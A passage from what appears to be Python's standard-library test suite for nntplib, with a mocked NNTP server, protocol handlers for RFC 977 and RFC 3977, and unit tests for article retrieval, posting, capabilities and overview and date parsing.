GROUP_NAME = 'comp.lang.python'
GROUP_PAT = 'comp.lang.*'
NNTP_CLASS = getattr(nntplib, 'NNTP_SSL', None)
# Disabled as it produces too much data
test_list = None
# Disabled as the connection will already be encrypted.
test_starttls = None
#
# Non-networked tests using a local server (or something mocking it).
#
class _NNTPServerIO(io.RawIOBase):
"""A raw IO object allowing NNTP commands to be received and processed
by a handler. The handler can push responses which can then be read
from the IO object."""
def __init__(self, handler):
io.RawIOBase.__init__(self)
# The channel from the client
self.c2s = io.BytesIO()
# The channel to the client
self.s2c = io.BytesIO()
self.handler = handler
self.handler.start(self.c2s.readline, self.push_data)
def readable(self):
return True
def writable(self):
return True
def push_data(self, data):
"""Push (buffer) some data to send to the client."""
pos = self.s2c.tell()
self.s2c.seek(0, 2)
self.s2c.write(data)
self.s2c.seek(pos)
def write(self, b):
"""The client sends us some data"""
pos = self.c2s.tell()
self.c2s.write(b)
self.c2s.seek(pos)
self.handler.process_pending()
return len(b)
def readinto(self, buf):
"""The client wants to read a response"""
self.handler.process_pending()
b = self.s2c.read(len(buf))
n = len(b)
buf[:n] = b
return n
def make_mock_file(handler):
sio = _NNTPServerIO(handler)
# Using BufferedRWPair instead of BufferedRandom ensures the file
# isn't seekable.
file = io.BufferedRWPair(sio, sio)
return (sio, file)
class MockedNNTPTestsMixin:
# Override in derived classes
handler_class = None
def setUp(self):
super().setUp()
self.make_server()
def tearDown(self):
super().tearDown()
del self.server
def make_server(self, *args, **kwargs):
self.handler = self.handler_class()
self.sio, file = make_mock_file(self.handler)
self.server = nntplib._NNTPBase(file, 'test.server', *args, **kwargs)
return self.server
class MockedNNTPWithReaderModeMixin(MockedNNTPTestsMixin):
def setUp(self):
super().setUp()
self.make_server(readermode=True)
class NNTPv1Handler:
"""A handler for RFC 977"""
welcome = "200 NNTP mock server"
def start(self, readline, push_data):
self.in_body = False
self.allow_posting = True
self._readline = readline
self._push_data = push_data
self._logged_in = False
self._user_sent = False
# Our welcome
self.handle_welcome()
def _decode(self, data):
return str(data, "utf-8", "surrogateescape")
def process_pending(self):
if self.in_body:
while True:
line = self._readline()
if not line:
return
self.body.append(line)
if line == b".\r\n":
break
try:
meth, tokens = self.body_callback
meth(*tokens, body=self.body)
finally:
self.body_callback = None
self.body = None
self.in_body = False
while True:
line = self._decode(self._readline())
if not line:
return
if not line.endswith("\r\n"):
raise ValueError("line doesn't end with \\r\\n: {!r}".format(line))
line = line[:-2]
cmd, *tokens = line.split()
#meth = getattr(self.handler, "handle_" + cmd.upper(), None)
meth = getattr(self, "handle_" + cmd.upper(), None)
if meth is None:
self.handle_unknown()
else:
try:
meth(*tokens)
except Exception as e:
raise ValueError("command failed: {!r}".format(line)) from e
else:
if self.in_body:
self.body_callback = meth, tokens
self.body = []
def expect_body(self):
"""Flag that the client is expected to post a request body"""
self.in_body = True
def push_data(self, data):
"""Push some binary data"""
self._push_data(data)
def push_lit(self, lit):
"""Push a string literal"""
lit = textwrap.dedent(lit)
lit = "\r\n".join(lit.splitlines()) + "\r\n"
lit = lit.encode('utf-8')
self.push_data(lit)
def handle_unknown(self):
self.push_lit("500 What?")
def handle_welcome(self):
self.push_lit(self.welcome)
def handle_QUIT(self):
self.push_lit("205 Bye!")
def handle_DATE(self):
self.push_lit("111 20100914001155")
def handle_GROUP(self, group):
if group == "fr.comp.lang.python":
self.push_lit("211 486 761 1265 fr.comp.lang.python")
else:
self.push_lit("411 No such group {}".format(group))
def handle_HELP(self):
self.push_lit("""\
100 Legal commands
authinfo user Name|pass Password|generic <prog> <args>
date
help
Report problems to <[email protected]>
.""")
def handle_STAT(self, message_spec=None):
if message_spec is None:
self.push_lit("412 No newsgroup selected")
elif message_spec == "3000234":
self.push_lit("223 3000234 <[email protected]>")
elif message_spec == "<[email protected]>":
self.push_lit("223 0 <[email protected]>")
else:
self.push_lit("430 No Such Article Found")
def handle_NEXT(self):
self.push_lit("223 3000237 <[email protected]> retrieved")
def handle_LAST(self):
self.push_lit("223 3000234 <[email protected]> retrieved")
def handle_LIST(self, action=None, param=None):
if action is None:
self.push_lit("""\
215 Newsgroups in form "group high low flags".
comp.lang.python 0000052340 0000002828 y
comp.lang.python.announce 0000001153 0000000993 m
free.it.comp.lang.python 0000000002 0000000002 y
fr.comp.lang.python 0000001254 0000000760 y
free.it.comp.lang.python.learner 0000000000 0000000001 y
tw.bbs.comp.lang.python 0000000304 0000000304 y
.""")
elif action == "ACTIVE":
if param == "*distutils*":
self.push_lit("""\
215 Newsgroups in form "group high low flags"
gmane.comp.python.distutils.devel 0000014104 0000000001 m
gmane.comp.python.distutils.cvs 0000000000 0000000001 m
.""")
else:
self.push_lit("""\
215 Newsgroups in form "group high low flags"
.""")
elif action == "OVERVIEW.FMT":
self.push_lit("""\
215 Order of fields in overview database.
Subject:
From:
Date:
Message-ID:
References:
Bytes:
Lines:
Xref:full
.""")
elif action == "NEWSGROUPS":
assert param is not None
if param == "comp.lang.python":
self.push_lit("""\
215 Descriptions in form "group description".
comp.lang.python\tThe Python computer language.
.""")
elif param == "comp.lang.python*":
self.push_lit("""\
215 Descriptions in form "group description".
comp.lang.python.announce\tAnnouncements about the Python language. (Moderated)
comp.lang.python\tThe Python computer language.
.""")
else:
self.push_lit("""\
215 Descriptions in form "group description".
.""")
else:
self.push_lit('501 Unknown LIST keyword')
def handle_NEWNEWS(self, group, date_str, time_str):
# We hard code different return messages depending on passed
# argument and date syntax.
if (group == "comp.lang.python" and date_str == "20100913"
and time_str == "082004"):
# Date was passed in RFC 3977 format (NNTP "v2")
self.push_lit("""\
230 list of newsarticles (NNTP v2) created after Mon Sep 13 08:20:04 2010 follows
<[email protected]>
<[email protected]>
.""")
elif (group == "comp.lang.python" and date_str == "100913"
and time_str == "082004"):
# Date was passed in RFC 977 format (NNTP "v1")
self.push_lit("""\
230 list of newsarticles (NNTP v1) created after Mon Sep 13 08:20:04 2010 follows
<[email protected]>
<[email protected]>
.""")
elif (group == 'comp.lang.python' and
date_str in ('20100101', '100101') and
time_str == '090000'):
self.push_lit('too long line' * 3000 +
'\n.')
else:
self.push_lit("""\
230 An empty list of newsarticles follows
.""")
# (Note for experiments: many servers disable NEWNEWS.
# As of this writing, sicinfo3.epfl.ch doesn't.)
def handle_XOVER(self, message_spec):
if message_spec == "57-59":
self.push_lit(
"224 Overview information for 57-58 follows\n"
"57\tRe: ANN: New Plone book with strong Python (and Zope) themes throughout"
"\tDoug Hellmann <[email protected]>"
"\tSat, 19 Jun 2010 18:04:08 -0400"
"\t<[email protected]>"
"\t<[email protected]>\t7103\t16"
"\tXref: news.gmane.io gmane.comp.python.authors:57"
"\n"
"58\tLooking for a few good bloggers"
"\tDoug Hellmann <[email protected]>"
"\tThu, 22 Jul 2010 09:14:14 -0400"
"\t<[email protected]>"
"\t\t6683\t16"
"\t"
"\n"
# A UTF-8 overview line from fr.comp.lang.python
"59\tRe: Message d'erreur incompréhensible (par moi)"
"\tEric Brunel <[email protected]>"
"\tWed, 15 Sep 2010 18:09:15 +0200"
"\t<[email protected]>"
"\t<[email protected]>\t1641\t27"
"\tXref: saria.nerim.net fr.comp.lang.python:1265"
"\n"
".\n")
else:
self.push_lit("""\
224 No articles
.""")
def handle_POST(self, *, body=None):
if body is None:
if self.allow_posting:
self.push_lit("340 Input article; end with <CR-LF>.<CR-LF>")
self.expect_body()
else:
self.push_lit("440 Posting not permitted")
else:
assert self.allow_posting
self.push_lit("240 Article received OK")
self.posted_body = body
def handle_IHAVE(self, message_id, *, body=None):
if body is None:
if (self.allow_posting and
message_id == "<[email protected]>"):
self.push_lit("335 Send it; end with <CR-LF>.<CR-LF>")
self.expect_body()
else:
self.push_lit("435 Article not wanted")
else:
assert self.allow_posting
self.push_lit("235 Article transferred OK")
self.posted_body = body
sample_head = """\
From: "Demo User" <[email protected]>
Subject: I am just a test article
Content-Type: text/plain; charset=UTF-8; format=flowed
Message-ID: <[email protected]>"""
sample_body = """\
This is just a test article.
..Here is a dot-starting line.
-- Signed by Andr\xe9."""
sample_article = sample_head + "\n\n" + sample_body
def handle_ARTICLE(self, message_spec=None):
if message_spec is None:
self.push_lit("220 3000237 <[email protected]>")
elif message_spec == "<[email protected]>":
self.push_lit("220 0 <[email protected]>")
elif message_spec == "3000234":
self.push_lit("220 3000234 <[email protected]>")
else:
self.push_lit("430 No Such Article Found")
return
self.push_lit(self.sample_article)
self.push_lit(".")
def handle_HEAD(self, message_spec=None):
if message_spec is None:
self.push_lit("221 3000237 <[email protected]>")
elif message_spec == "<[email protected]>":
self.push_lit("221 0 <[email protected]>")
elif message_spec == "3000234":
self.push_lit("221 3000234 <[email protected]>")
else:
self.push_lit("430 No Such Article Found")
return
self.push_lit(self.sample_head)
self.push_lit(".")
def handle_BODY(self, message_spec=None):
if message_spec is None:
self.push_lit("222 3000237 <[email protected]>")
elif message_spec == "<[email protected]>":
self.push_lit("222 0 <[email protected]>")
elif message_spec == "3000234":
self.push_lit("222 3000234 <[email protected]>")
else:
self.push_lit("430 No Such Article Found")
return
self.push_lit(self.sample_body)
self.push_lit(".")
def handle_AUTHINFO(self, cred_type, data):
if self._logged_in:
self.push_lit('502 Already Logged In')
elif cred_type == 'user':
if self._user_sent:
self.push_lit('482 User Credential Already Sent')
else:
self.push_lit('381 Password Required')
self._user_sent = True
elif cred_type == 'pass':
self.push_lit('281 Login Successful')
self._logged_in = True
else:
raise Exception('Unknown cred type {}'.format(cred_type))
class NNTPv2Handler(NNTPv1Handler):
"""A handler for RFC 3977 (NNTP "v2")"""
def handle_CAPABILITIES(self):
fmt = """\
101 Capability list:
VERSION 2 3
IMPLEMENTATION INN 2.5.1{}
HDR
LIST ACTIVE ACTIVE.TIMES DISTRIB.PATS HEADERS NEWSGROUPS OVERVIEW.FMT
OVER
POST
READER
."""
if not self._logged_in:
self.push_lit(fmt.format('\n AUTHINFO USER'))
else:
self.push_lit(fmt.format(''))
def handle_MODE(self, _):
raise Exception('MODE READER sent despite READER has been advertised')
def handle_OVER(self, message_spec=None):
return self.handle_XOVER(message_spec)
class CapsAfterLoginNNTPv2Handler(NNTPv2Handler):
"""A handler that allows CAPABILITIES only after login"""
def handle_CAPABILITIES(self):
if not self._logged_in:
self.push_lit('480 You must log in.')
else:
super().handle_CAPABILITIES()
class ModeSwitchingNNTPv2Handler(NNTPv2Handler):
"""A server that starts in transit mode"""
def __init__(self):
self._switched = False
def handle_CAPABILITIES(self):
fmt = """\
101 Capability list:
VERSION 2 3
IMPLEMENTATION INN 2.5.1
HDR
LIST ACTIVE ACTIVE.TIMES DISTRIB.PATS HEADERS NEWSGROUPS OVERVIEW.FMT
OVER
POST
{}READER
."""
if self._switched:
self.push_lit(fmt.format(''))
else:
self.push_lit(fmt.format('MODE-'))
def handle_MODE(self, what):
assert not self._switched and what == 'reader'
self._switched = True
self.push_lit('200 Posting allowed')
class NNTPv1v2TestsMixin:
def setUp(self):
super().setUp()
def test_welcome(self):
self.assertEqual(self.server.welcome, self.handler.welcome)
def test_authinfo(self):
if self.nntp_version == 2:
self.assertIn('AUTHINFO', self.server._caps)
self.server.login('testuser', 'testpw')
# if AUTHINFO is gone from _caps we also know that getcapabilities()
# has been called after login as it should
self.assertNotIn('AUTHINFO', self.server._caps)
def test_date(self):
resp, date = self.server.date()
self.assertEqual(resp, "111 20100914001155")
self.assertEqual(date, datetime.datetime(2010, 9, 14, 0, 11, 55))
def test_quit(self):
self.assertFalse(self.sio.closed)
resp = self.server.quit()
self.assertEqual(resp, "205 Bye!")
self.assertTrue(self.sio.closed)
def test_help(self):
resp, help = self.server.help()
self.assertEqual(resp, "100 Legal commands")
self.assertEqual(help, [
' authinfo user Name|pass Password|generic <prog> <args>',
' date',
' help',
'Report problems to <[email protected]>',
])
def test_list(self):
resp, groups = self.server.list()
self.assertEqual(len(groups), 6)
g = groups[1]
self.assertEqual(g,
GroupInfo("comp.lang.python.announce", "0000001153",
"0000000993", "m"))
resp, groups = self.server.list("*distutils*")
self.assertEqual(len(groups), 2)
g = groups[0]
self.assertEqual(g,
GroupInfo("gmane.comp.python.distutils.devel", "0000014104",
"0000000001", "m"))
def test_stat(self):
resp, art_num, message_id = self.server.stat(3000234)
self.assertEqual(resp, "223 3000234 <[email protected]>")
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<[email protected]>")
resp, art_num, message_id = self.server.stat("<[email protected]>")
self.assertEqual(resp, "223 0 <[email protected]>")
self.assertEqual(art_num, 0)
self.assertEqual(message_id, "<[email protected]>")
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.stat("<non.existent.id>")
self.assertEqual(cm.exception.response, "430 No Such Article Found")
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.stat()
self.assertEqual(cm.exception.response, "412 No newsgroup selected")
def test_next(self):
resp, art_num, message_id = self.server.next()
self.assertEqual(resp, "223 3000237 <[email protected]> retrieved")
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<[email protected]>")
def test_last(self):
resp, art_num, message_id = self.server.last()
self.assertEqual(resp, "223 3000234 <[email protected]> retrieved")
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<[email protected]>")
def test_description(self):
desc = self.server.description("comp.lang.python")
self.assertEqual(desc, "The Python computer language.")
desc = self.server.description("comp.lang.pythonx")
self.assertEqual(desc, "")
def test_descriptions(self):
resp, groups = self.server.descriptions("comp.lang.python")
self.assertEqual(resp, '215 Descriptions in form "group description".')
self.assertEqual(groups, {
"comp.lang.python": "The Python computer language.",
})
resp, groups = self.server.descriptions("comp.lang.python*")
self.assertEqual(groups, {
"comp.lang.python": "The Python computer language.",
"comp.lang.python.announce": "Announcements about the Python language. (Moderated)",
})
resp, groups = self.server.descriptions("comp.lang.pythonx")
self.assertEqual(groups, {})
def test_group(self):
resp, count, first, last, group = self.server.group("fr.comp.lang.python")
self.assertTrue(resp.startswith("211 "), resp)
self.assertEqual(first, 761)
self.assertEqual(last, 1265)
self.assertEqual(count, 486)
self.assertEqual(group, "fr.comp.lang.python")
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.group("comp.lang.python.devel")
exc = cm.exception
self.assertTrue(exc.response.startswith("411 No such group"),
exc.response)
def test_newnews(self):
# NEWNEWS comp.lang.python [20]100913 082004
dt = datetime.datetime(2010, 9, 13, 8, 20, 4)
resp, ids = self.server.newnews("comp.lang.python", dt)
expected = (
"230 list of newsarticles (NNTP v{0}) "
"created after Mon Sep 13 08:20:04 2010 follows"
).format(self.nntp_version)
self.assertEqual(resp, expected)
self.assertEqual(ids, [
"<[email protected]>",
"<[email protected]>",
])
# NEWNEWS fr.comp.lang.python [20]100913 082004
dt = datetime.datetime(2010, 9, 13, 8, 20, 4)
resp, ids = self.server.newnews("fr.comp.lang.python", dt)
self.assertEqual(resp, "230 An empty list of newsarticles follows")
self.assertEqual(ids, [])
def _check_article_body(self, lines):
self.assertEqual(len(lines), 4)
self.assertEqual(lines[-1].decode('utf-8'), "-- Signed by André.")
self.assertEqual(lines[-2], b"")
self.assertEqual(lines[-3], b".Here is a dot-starting line.")
self.assertEqual(lines[-4], b"This is just a test article.")
def _check_article_head(self, lines):
self.assertEqual(len(lines), 4)
self.assertEqual(lines[0], b'From: "Demo User" <[email protected]>')
self.assertEqual(lines[3], b"Message-ID: <[email protected]>")
def _check_article_data(self, lines):
self.assertEqual(len(lines), 9)
self._check_article_head(lines[:4])
self._check_article_body(lines[-4:])
self.assertEqual(lines[4], b"")
def test_article(self):
# ARTICLE
resp, info = self.server.article()
self.assertEqual(resp, "220 3000237 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_data(lines)
# ARTICLE num
resp, info = self.server.article(3000234)
self.assertEqual(resp, "220 3000234 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_data(lines)
# ARTICLE id
resp, info = self.server.article("<[email protected]>")
self.assertEqual(resp, "220 0 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 0)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_data(lines)
# Non-existent id
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.article("<[email protected]>")
self.assertEqual(cm.exception.response, "430 No Such Article Found")
def test_article_file(self):
# With a "file" argument
f = io.BytesIO()
resp, info = self.server.article(file=f)
self.assertEqual(resp, "220 3000237 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<[email protected]>")
self.assertEqual(lines, [])
data = f.getvalue()
self.assertTrue(data.startswith(
b'From: "Demo User" <[email protected]>\r\n'
b'Subject: I am just a test article\r\n'
), ascii(data))
self.assertTrue(data.endswith(
b'This is just a test article.\r\n'
b'.Here is a dot-starting line.\r\n'
b'\r\n'
b'-- Signed by Andr\xc3\xa9.\r\n'
), ascii(data))
def test_head(self):
# HEAD
resp, info = self.server.head()
self.assertEqual(resp, "221 3000237 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_head(lines)
# HEAD num
resp, info = self.server.head(3000234)
self.assertEqual(resp, "221 3000234 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_head(lines)
# HEAD id
resp, info = self.server.head("<[email protected]>")
self.assertEqual(resp, "221 0 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 0)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_head(lines)
# Non-existent id
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.head("<[email protected]>")
self.assertEqual(cm.exception.response, "430 No Such Article Found")
def test_head_file(self):
f = io.BytesIO()
resp, info = self.server.head(file=f)
self.assertEqual(resp, "221 3000237 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<[email protected]>")
self.assertEqual(lines, [])
data = f.getvalue()
self.assertTrue(data.startswith(
b'From: "Demo User" <[email protected]>\r\n'
b'Subject: I am just a test article\r\n'
), ascii(data))
self.assertFalse(data.endswith(
b'This is just a test article.\r\n'
b'.Here is a dot-starting line.\r\n'
b'\r\n'
b'-- Signed by Andr\xc3\xa9.\r\n'
), ascii(data))
def test_body(self):
# BODY
resp, info = self.server.body()
self.assertEqual(resp, "222 3000237 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_body(lines)
# BODY num
resp, info = self.server.body(3000234)
self.assertEqual(resp, "222 3000234 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000234)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_body(lines)
# BODY id
resp, info = self.server.body("<[email protected]>")
self.assertEqual(resp, "222 0 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 0)
self.assertEqual(message_id, "<[email protected]>")
self._check_article_body(lines)
# Non-existent id
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.body("<[email protected]>")
self.assertEqual(cm.exception.response, "430 No Such Article Found")
def test_body_file(self):
f = io.BytesIO()
resp, info = self.server.body(file=f)
self.assertEqual(resp, "222 3000237 <[email protected]>")
art_num, message_id, lines = info
self.assertEqual(art_num, 3000237)
self.assertEqual(message_id, "<[email protected]>")
self.assertEqual(lines, [])
data = f.getvalue()
self.assertFalse(data.startswith(
b'From: "Demo User" <[email protected]>\r\n'
b'Subject: I am just a test article\r\n'
), ascii(data))
self.assertTrue(data.endswith(
b'This is just a test article.\r\n'
b'.Here is a dot-starting line.\r\n'
b'\r\n'
b'-- Signed by Andr\xc3\xa9.\r\n'
), ascii(data))
def check_over_xover_resp(self, resp, overviews):
self.assertTrue(resp.startswith("224 "), resp)
self.assertEqual(len(overviews), 3)
art_num, over = overviews[0]
self.assertEqual(art_num, 57)
self.assertEqual(over, {
"from": "Doug Hellmann <[email protected]>",
"subject": "Re: ANN: New Plone book with strong Python (and Zope) themes throughout",
"date": "Sat, 19 Jun 2010 18:04:08 -0400",
"message-id": "<[email protected]>",
"references": "<[email protected]>",
":bytes": "7103",
":lines": "16",
"xref": "news.gmane.io gmane.comp.python.authors:57"
})
art_num, over = overviews[1]
self.assertEqual(over["xref"], None)
art_num, over = overviews[2]
self.assertEqual(over["subject"],
"Re: Message d'erreur incompréhensible (par moi)")
def test_xover(self):
resp, overviews = self.server.xover(57, 59)
self.check_over_xover_resp(resp, overviews)
def test_over(self):
# In NNTP "v1", this will fallback on XOVER
resp, overviews = self.server.over((57, 59))
self.check_over_xover_resp(resp, overviews)
sample_post = (
b'From: "Demo User" <[email protected]>\r\n'
b'Subject: I am just a test article\r\n'
b'Content-Type: text/plain; charset=UTF-8; format=flowed\r\n'
b'Message-ID: <[email protected]>\r\n'
b'\r\n'
b'This is just a test article.\r\n'
b'.Here is a dot-starting line.\r\n'
b'\r\n'
b'-- Signed by Andr\xc3\xa9.\r\n'
)
def _check_posted_body(self):
# Check the raw body as received by the server
lines = self.handler.posted_body
# One additional line for the "." terminator
self.assertEqual(len(lines), 10)
self.assertEqual(lines[-1], b'.\r\n')
self.assertEqual(lines[-2], b'-- Signed by Andr\xc3\xa9.\r\n')
self.assertEqual(lines[-3], b'\r\n')
self.assertEqual(lines[-4], b'..Here is a dot-starting line.\r\n')
self.assertEqual(lines[0], b'From: "Demo User" <[email protected]>\r\n')
def _check_post_ihave_sub(self, func, *args, file_factory):
# First the prepared post with CRLF endings
post = self.sample_post
func_args = args + (file_factory(post),)
self.handler.posted_body = None
resp = func(*func_args)
self._check_posted_body()
# Then the same post with "normal" line endings - they should be
# converted by NNTP.post and NNTP.ihave.
post = self.sample_post.replace(b"\r\n", b"\n")
func_args = args + (file_factory(post),)
self.handler.posted_body = None
resp = func(*func_args)
self._check_posted_body()
return resp
def check_post_ihave(self, func, success_resp, *args):
# With a bytes object
resp = self._check_post_ihave_sub(func, *args, file_factory=bytes)
self.assertEqual(resp, success_resp)
# With a bytearray object
resp = self._check_post_ihave_sub(func, *args, file_factory=bytearray)
self.assertEqual(resp, success_resp)
# With a file object
resp = self._check_post_ihave_sub(func, *args, file_factory=io.BytesIO)
self.assertEqual(resp, success_resp)
# With an iterable of terminated lines
def iterlines(b):
return iter(b.splitlines(keepends=True))
resp = self._check_post_ihave_sub(func, *args, file_factory=iterlines)
self.assertEqual(resp, success_resp)
# With an iterable of non-terminated lines
def iterlines(b):
return iter(b.splitlines(keepends=False))
resp = self._check_post_ihave_sub(func, *args, file_factory=iterlines)
self.assertEqual(resp, success_resp)
def test_post(self):
self.check_post_ihave(self.server.post, "240 Article received OK")
self.handler.allow_posting = False
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.post(self.sample_post)
self.assertEqual(cm.exception.response,
"440 Posting not permitted")
def test_ihave(self):
self.check_post_ihave(self.server.ihave, "235 Article transferred OK",
"<[email protected]>")
with self.assertRaises(nntplib.NNTPTemporaryError) as cm:
self.server.ihave("<another.message.id>", self.sample_post)
self.assertEqual(cm.exception.response,
"435 Article not wanted")
def test_too_long_lines(self):
dt = datetime.datetime(2010, 1, 1, 9, 0, 0)
self.assertRaises(nntplib.NNTPDataError,
self.server.newnews, "comp.lang.python", dt)
class NNTPv1Tests(NNTPv1v2TestsMixin, MockedNNTPTestsMixin, unittest.TestCase):
"""Tests an NNTP v1 server (no capabilities)."""
nntp_version = 1
handler_class = NNTPv1Handler
def test_caps(self):
caps = self.server.getcapabilities()
self.assertEqual(caps, {})
self.assertEqual(self.server.nntp_version, 1)
self.assertEqual(self.server.nntp_implementation, None)
class NNTPv2Tests(NNTPv1v2TestsMixin, MockedNNTPTestsMixin, unittest.TestCase):
"""Tests an NNTP v2 server (with capabilities)."""
nntp_version = 2
handler_class = NNTPv2Handler
def test_caps(self):
caps = self.server.getcapabilities()
self.assertEqual(caps, {
'VERSION': ['2', '3'],
'IMPLEMENTATION': ['INN', '2.5.1'],
'AUTHINFO': ['USER'],
'HDR': [],
'LIST': ['ACTIVE', 'ACTIVE.TIMES', 'DISTRIB.PATS',
'HEADERS', 'NEWSGROUPS', 'OVERVIEW.FMT'],
'OVER': [],
'POST': [],
'READER': [],
})
self.assertEqual(self.server.nntp_version, 3)
self.assertEqual(self.server.nntp_implementation, 'INN 2.5.1')
class CapsAfterLoginNNTPv2Tests(MockedNNTPTestsMixin, unittest.TestCase):
"""Tests a probably NNTP v2 server with capabilities only after login."""
nntp_version = 2
handler_class = CapsAfterLoginNNTPv2Handler
def test_caps_only_after_login(self):
self.assertEqual(self.server._caps, {})
self.server.login('testuser', 'testpw')
self.assertIn('VERSION', self.server._caps)
class SendReaderNNTPv2Tests(MockedNNTPWithReaderModeMixin,
unittest.TestCase):
"""Same tests as for v2 but we tell NTTP to send MODE READER to a server
that isn't in READER mode by default."""
nntp_version = 2
handler_class = ModeSwitchingNNTPv2Handler
def test_we_are_in_reader_mode_after_connect(self):
self.assertIn('READER', self.server._caps)
class MiscTests(unittest.TestCase):
def test_decode_header(self):
def gives(a, b):
self.assertEqual(nntplib.decode_header(a), b)
gives("" , "")
gives("a plain header", "a plain header")
gives(" with extra spaces ", " with extra spaces ")
gives("=?ISO-8859-15?Q?D=E9buter_en_Python?=", "Débuter en Python")
gives("=?utf-8?q?Re=3A_=5Bsqlite=5D_probl=C3=A8me_avec_ORDER_BY_sur_des_cha?="
" =?utf-8?q?=C3=AEnes_de_caract=C3=A8res_accentu=C3=A9es?=",
"Re: [sqlite] problème avec ORDER BY sur des chaînes de caractères accentuées")
gives("Re: =?UTF-8?B?cHJvYmzDqG1lIGRlIG1hdHJpY2U=?=",
"Re: problème de matrice")
# A natively utf-8 header (found in the real world!)
gives("Re: Message d'erreur incompréhensible (par moi)",
"Re: Message d'erreur incompréhensible (par moi)")
def test_parse_overview_fmt(self):
# The minimal (default) response
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", ":bytes", ":lines"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines"])
# The minimal response using alternative names
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", "Bytes:", "Lines:"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines"])
# Variations in casing
lines = ["subject:", "FROM:", "DaTe:", "message-ID:",
"References:", "BYTES:", "Lines:"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines"])
# First example from RFC 3977
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", ":bytes", ":lines", "Xref:full",
"Distribution:full"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines", "xref", "distribution"])
# Second example from RFC 3977
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", "Bytes:", "Lines:", "Xref:FULL",
"Distribution:FULL"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines", "xref", "distribution"])
# A classic response from INN
lines = ["Subject:", "From:", "Date:", "Message-ID:",
"References:", "Bytes:", "Lines:", "Xref:full"]
self.assertEqual(nntplib._parse_overview_fmt(lines),
["subject", "from", "date", "message-id", "references",
":bytes", ":lines", "xref"])
def test_parse_overview(self):
fmt = nntplib._DEFAULT_OVERVIEW_FMT + ["xref"]
# First example from RFC 3977
lines = [
'3000234\tI am just a test article\t"Demo User" '
'<[email protected]>\t6 Oct 1998 04:38:40 -0500\t'
'<[email protected]>\t<[email protected]>\t1234\t'
'17\tXref: news.example.com misc.test:3000363',
]
overview = nntplib._parse_overview(lines, fmt)
(art_num, fields), = overview
self.assertEqual(art_num, 3000234)
self.assertEqual(fields, {
'subject': 'I am just a test article',
'from': '"Demo User" <[email protected]>',
'date': '6 Oct 1998 04:38:40 -0500',
'message-id': '<[email protected]>',
'references': '<[email protected]>',
':bytes': '1234',
':lines': '17',
'xref': 'news.example.com misc.test:3000363',
})
# Second example; here the "Xref" field is totally absent (including
# the header name) and comes out as None
lines = [
'3000234\tI am just a test article\t"Demo User" '
'<[email protected]>\t6 Oct 1998 04:38:40 -0500\t'
'<[email protected]>\t<[email protected]>\t1234\t'
'17\t\t',
]
overview = nntplib._parse_overview(lines, fmt)
(art_num, fields), = overview
self.assertEqual(fields['xref'], None)
# Third example; the "Xref" is an empty string, while "references"
# is a single space.
lines = [
'3000234\tI am just a test article\t"Demo User" '
'<[email protected]>\t6 Oct 1998 04:38:40 -0500\t'
'<[email protected]>\t \t1234\t'
'17\tXref: \t',
]
overview = nntplib._parse_overview(lines, fmt)
(art_num, fields), = overview
self.assertEqual(fields['references'], ' ')
self.assertEqual(fields['xref'], '')
def test_parse_datetime(self):
def gives(a, b, *c):
self.assertEqual(nntplib._parse_datetime(a, b),
datetime.datetime(*c))
# Output of DATE command
gives("19990623135624", None, 1999, 6, 23, 13, 56, 24)
# Variations
gives("19990623", "135624", 1999, 6, 23, 13, 56, 24)
gives("990623", "135624", 1999, 6, 23, 13, 56, 24)
gives("090623", "135624", 2009, 6, 23, 13, 56, 24)
def test_unparse_datetime(self):
# Test non-legacy mode
# 1) with a datetime
def gives(y, M, d, h, m, s, date_str, time_str):
dt = datetime.datetime(y, M, d, h, m, s)
self.assertEqual(nntplib._unparse_datetime(dt),
(date_str, time_str))
self.assertEqual(nntplib._unparse_datetime(dt, False),
(date_str, time_str))
gives(1999, 6, 23, 13, 56, 24, "19990623", "135624")
gives(2000, 6, 23, 13, 56, 24, "20000623", "135624")
